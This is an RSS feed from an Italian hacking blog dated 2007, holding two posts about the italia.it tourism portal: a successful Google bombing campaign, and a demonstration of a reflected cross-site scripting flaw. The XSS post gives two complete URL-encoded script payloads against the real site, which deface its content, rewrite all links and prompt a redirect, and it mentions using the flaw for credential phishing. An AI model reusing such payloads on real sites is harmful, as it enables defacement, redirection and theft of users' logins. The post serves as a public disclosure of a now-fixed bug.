<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Blog ad Improbabilità Infinita &#187; Hack</title>
	<atom:link href="http://www.jhack.it/blog/tag/hack/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.jhack.it/blog</link>
	<description>L&#039;unico blog che può trasformarvi in una balena o in un vaso di petunie</description>
	<lastBuildDate>Sat, 04 Feb 2012 15:29:33 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=</generator>
		<item>
		<title>italia.it: google bombing riuscito!</title>
		<link>http://www.jhack.it/blog/2007/03/15/italiait-google-bombing-riuscito/</link>
		<comments>http://www.jhack.it/blog/2007/03/15/italiait-google-bombing-riuscito/#comments</comments>
		<pubDate>Thu, 15 Mar 2007 17:44:25 +0000</pubDate>
		<dc:creator>Jhack</dc:creator>
				<category><![CDATA[Curiosità]]></category>
		<category><![CDATA[Giochi]]></category>
		<category><![CDATA[Google]]></category>
		<category><![CDATA[Hacking]]></category>
		<category><![CDATA[Motori di ricerca]]></category>
		<category><![CDATA[Sociologia]]></category>
		<category><![CDATA[Hack]]></category>
		<category><![CDATA[Informatica]]></category>

		<guid isPermaLink="false">http://www.jhack.it/blog/?p=193</guid>
		<description><![CDATA[Cos'è il "google bombing"? Potete trovare una definizione molto chiara qui, ma in pratica consiste nello sfruttare l'algoritmo di ranking (PageRanking) delle pagine presenti sul web utilizzato dal motore di ricerca Google. Tale algoritmo dà maggior credito a quei siti dei quali si parla di più, ovvero, tradotto in termine di codice html, a quei <a href="http://www.jhack.it/blog/2007/03/15/italiait-google-bombing-riuscito/#more-193" class="more-link">Continue reading &#8594;</a>
Related posts:<ol>
<li><a href='http://www.jhack.it/blog/2007/02/25/italiait-applicazione-pratica-di-xss/' rel='bookmark' title='italia.it: Applicazione Pratica di XSS'>italia.it: Applicazione Pratica di XSS</a> <small>Innanzitutto, cos'è XSS? L'acronimo sta per "Cross-Site Scripting" (la X...</small></li>
</ol>]]></description>
			<content:encoded><![CDATA[<p>Cos'è il "<strong>google bombing</strong>"? Potete trovare una definizione molto chiara <a href="http://it.wikipedia.org/wiki/Googlebombing">qui</a>, ma in pratica consiste nello sfruttare l'algoritmo di ranking (<a href="http://it.wikipedia.org/wiki/Pagerank">PageRanking</a>) delle pagine presenti sul web utilizzato dal motore di ricerca <strong>Google</strong>. Tale algoritmo dà maggior credito a quei siti dei quali si parla di più, ovvero, tradotto in termine di codice html, a quei siti raggiunti da molti link.</p>
<p align="center"><a title="italiait-merda.png" href="http://jhack.files.wordpress.com/2007/03/italiait-merda.png"><img src="http://jhack.files.wordpress.com/2007/03/italiait-merda.png" alt="italiait-merda.png" height="244" /></a></p>
<p style="text-align:center;"><span id="more-193"></span></p>
<p>In particolare, se un discreto numero di utenti riesce a trovare un accordo sul contenuto testuale dei link che puntano ad un certo sito è possibile far sì che la ricerca di una parola o di una frase su Google restituisca come <strong>primo risultato </strong>proprio quel sito!<br />
In questo caso il link che si è voluto creare è stato "<em>&lt;a href="http://www.italia.it"&gt;<strong>merda</strong>&lt;/a&gt;</em>" (<a href="http://www.italia.it">merda</a>) ed infatti in breve tempo si è riusciti ad ottenere il risultato desiderato: oggi su Google.it la ricerca di tale vocabolo restituisce come primo risultato effettivamente quell'<a href="http://jhack.wordpress.com/2007/02/23/come-buttare-45-milioni-di-euro/">obbrobrio</a> di sito, come si può osservare cliccando <a href="http://www.google.it/search?q=merda">qui</a>. Forse tra qualche giorno qualcuno interverrà in modo tale da fare sparire quel risultato, ma ad imperitura memoria rimarrà comunque l'immagine proposta sopra <img src='http://www.jhack.it/blog/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> .<a href="http://jhack.wordpress.com/2007/02/23/come-buttare-45-milioni-di-euro/"><br />
</a></p>
<p>Related posts:<ol>
<li><a href='http://www.jhack.it/blog/2007/02/25/italiait-applicazione-pratica-di-xss/' rel='bookmark' title='italia.it: Applicazione Pratica di XSS'>italia.it: Applicazione Pratica di XSS</a> <small>Innanzitutto, cos'è XSS? L'acronimo sta per "Cross-Site Scripting" (la X...</small></li>
</ol></p>]]></content:encoded>
			<wfw:commentRss>http://www.jhack.it/blog/2007/03/15/italiait-google-bombing-riuscito/feed/</wfw:commentRss>
		<slash:comments>11</slash:comments>
		</item>
		<item>
		<title>italia.it: Applicazione Pratica di XSS</title>
		<link>http://www.jhack.it/blog/2007/02/25/italiait-applicazione-pratica-di-xss/</link>
		<comments>http://www.jhack.it/blog/2007/02/25/italiait-applicazione-pratica-di-xss/#comments</comments>
		<pubDate>Sun, 25 Feb 2007 20:29:34 +0000</pubDate>
		<dc:creator>Jhack</dc:creator>
				<category><![CDATA[Creazioni]]></category>
		<category><![CDATA[Hacking]]></category>
		<category><![CDATA[Informatica]]></category>
		<category><![CDATA[Javascript]]></category>
		<category><![CDATA[Web]]></category>
		<category><![CDATA[Cultura]]></category>
		<category><![CDATA[Hack]]></category>
		<category><![CDATA[Web 2.0]]></category>

		<guid isPermaLink="false">http://www.jhack.it/blog/?p=182</guid>
		<description><![CDATA[Innanzitutto, cos'è XSS? L'acronimo sta per "Cross-Site Scripting" (la X serve per evitare il conflitto con la sigla CSS, che indica tutt'altro). È spiegato molto bene, in inglese, qui. Per i più pigri, diciamo che si tratta di inserire codice maligno, solitamente Javascript, in pagine create da altri utenti. Ciò che si può fare è <a href="http://www.jhack.it/blog/2007/02/25/italiait-applicazione-pratica-di-xss/#more-182" class="more-link">Continue reading &#8594;</a>
Nessun post attinente.]]></description>
			<content:encoded><![CDATA[<p>Innanzitutto, cos'è <strong>XSS</strong>?</p>
<p align="center"><a title="jhack.png" href="http://jhack.files.wordpress.com/2007/02/jhack.png"><img src="http://jhack.files.wordpress.com/2007/02/jhack.png" alt="jhack.png" /></a></p>
<p>L'acronimo sta per "<strong>Cross-Site Scripting</strong>" (la X serve per evitare il conflitto con la sigla CSS, che indica tutt'altro).</p>
<p>È spiegato molto bene, in inglese, <a href="http://en.wikipedia.org/wiki/Cross_site_scripting">qui</a>. Per i più pigri, diciamo che si tratta di inserire codice maligno, solitamente Javascript, in pagine create da altri utenti.</p>
<p style="text-align:center;"><span id="more-182"></span></p>
<p>Ciò che si può fare è <strong>modificare qualsiasi informazione</strong>: nel mio caso le modifiche sono create appositamente in modo sufficientemente macroscopico per essere facilmente notate, ma un lavoro più "di fino" renderebbe i dati modificati assolutamente indistinguibili dagli altri.</p>
<p>Per spiegarvi come è possibile utilizzare in modo pratico questa falla di sicurezza vi propongo semplicemente dei link validi al sito. Se osservate gli URL vedrete che non è un mio sito modificato, ma proprio quello dell'Italia. <strong>Naturalmente quanto segue funziona solo al momento in cui è stato scritto questo e si spera che nell'immediato futuro la falla sia chiusa.</strong></p>
<ol>
<li><a href="http://www.italia.it/it/scout/text/5,it,SCH1/objectId,RGN8it,selectedEntry,home.html/result.html?scope=%22%3Cscript%3Edocument.getElementsByTagName(%22img%22)[3].src=%22http://www.cs.unibo.it/~gboccard/JhacK.png%22;document.getElementById(%22nav1liv%22).getElementsByTagName(%22td%22)[1].getElementsByTagName(%22a%22)[0].innerHTML=%22Visita%20l'ItaGlia%22;links=document.getElementsByTagName(%22a%22);for(i=0;i%3Clinks.length;i%2B%2B){links[i].href=%22http://jhack.wordpress.com%22};document.getElementById(%22corpoMain%22).innerHTML=%22%3Ch1%3ENuovo%20Fenomeno%20Mediatico!!!%3C/h1%3E%3Cp%3EIl%20Blog%20di%20%3Ca%20href='http://jhack.wordpress.com'%3EJhacK%3C/a%3E%20ormai%20rappresenta%20un%20must%20nel%20panorama%20italiano%20;)%3C/p%3E%22;var%20answer=confirm(%22Sono%20un%20brutto%20sito.\nVuoi%20andare%20in%20uno%20migliore?%22);if%20(answer)window.location=%22http://jhack.wordpress.com%22;%3C/script%3E" target="_blank"><strong>Primo link</strong></a>, provate a rispondere alla domanda proposta in entrambi i modi e, nel caso rimaniate sul sito, cercate di scovare le <strong>4</strong> modifiche presenti <img src='http://www.jhack.it/blog/wp-includes/images/smilies/icon_wink.gif' alt=';)' class='wp-smiley' /> ; nel caso in cui non funzioni più il link si osservi la seguente immagine:<a title="modificheprimolink.jpg" href="http://jhack.files.wordpress.com/2007/02/modificheprimolink.jpg" target="_blank"><br />
</a></p>
<p style="text-align:center;"><a title="modificheprimolink.jpg" href="http://jhack.files.wordpress.com/2007/02/modificheprimolink.jpg" target="_blank"><img style="width: 80%;" src="http://jhack.files.wordpress.com/2007/02/modificheprimolink.jpg" alt="modificheprimolink.jpg" /></a></p>
</li>
<li><a href="http://www.italia.it/it/scout/text/5,it,SCH1/objectId,RGN8it,selectedEntry,home.html/result.html?scope=%22%3Cscript%3ER=0;%20x1=.1;%20y1=.05;%20x2=.25;%20y2=.24;%20x3=1.6;%20y3=.24;%20x4=300;%20y4=200;%20x5=300;%20y5=200;%20DI=document.getElementsByTagName(%22img%22);%20DIL=DI.length;%20function%20A(){for(i=0;%20i-DIL;%20i%2B%2B){DIS=DI[%20i%20].style;%20DIS.position='absolute';%20DIS.left=(Math.sin(R*x1%2Bi*x2%2Bx3)*x4%2Bx5)%2B%22px%22;%20DIS.top=(Math.cos(R*y1%2Bi*y2%2By3)*y4%2By5)%2B%22px%22}R%2B%2B}setInterval('A()',5);%20void(0);%3C/script%3E" target="_blank"><strong>Secondo link</strong></a>, che rende il sito, come dire, più dinamico, se possibile, di quello che è <img src='http://www.jhack.it/blog/wp-includes/images/smilies/icon_biggrin.gif' alt=':D' class='wp-smiley' />  (record personale di incisi in una frase così corta!). In questo caso, se non funzionasse il link, immaginatevi le immagini del sito che danzano per lo schermo.</li>
</ol>
<p>Capirete quante altre porcate si possano fare e come si possa <strong>manipolare</strong> <strong>l'informazione</strong>. Quello che vi ho mostrato è più simpatico che dannoso, ma si fa presto a pensare ad un problema ben più grave: se ci fosse un form di login, sarebbe molto facile <strong>redirigere</strong> i dati inseriti dagli utenti (username e password) verso di me, attuando ciò che viene denominato <strong><a href="http://it.wikipedia.org/wiki/Phishing">phishing</a></strong>.</p>
<p><strong>AGGIORNAMENTO</strong>: ieri hanno finalmente hanno corretto questo grossolano bug, comunque potete vedere sempre lo screenshot del primo link <img src='http://www.jhack.it/blog/wp-includes/images/smilies/icon_wink.gif' alt=';)' class='wp-smiley' /> .</p>
<p>Nessun post attinente.</p>]]></content:encoded>
			<wfw:commentRss>http://www.jhack.it/blog/2007/02/25/italiait-applicazione-pratica-di-xss/feed/</wfw:commentRss>
		<slash:comments>9</slash:comments>
		</item>
	</channel>
</rss>

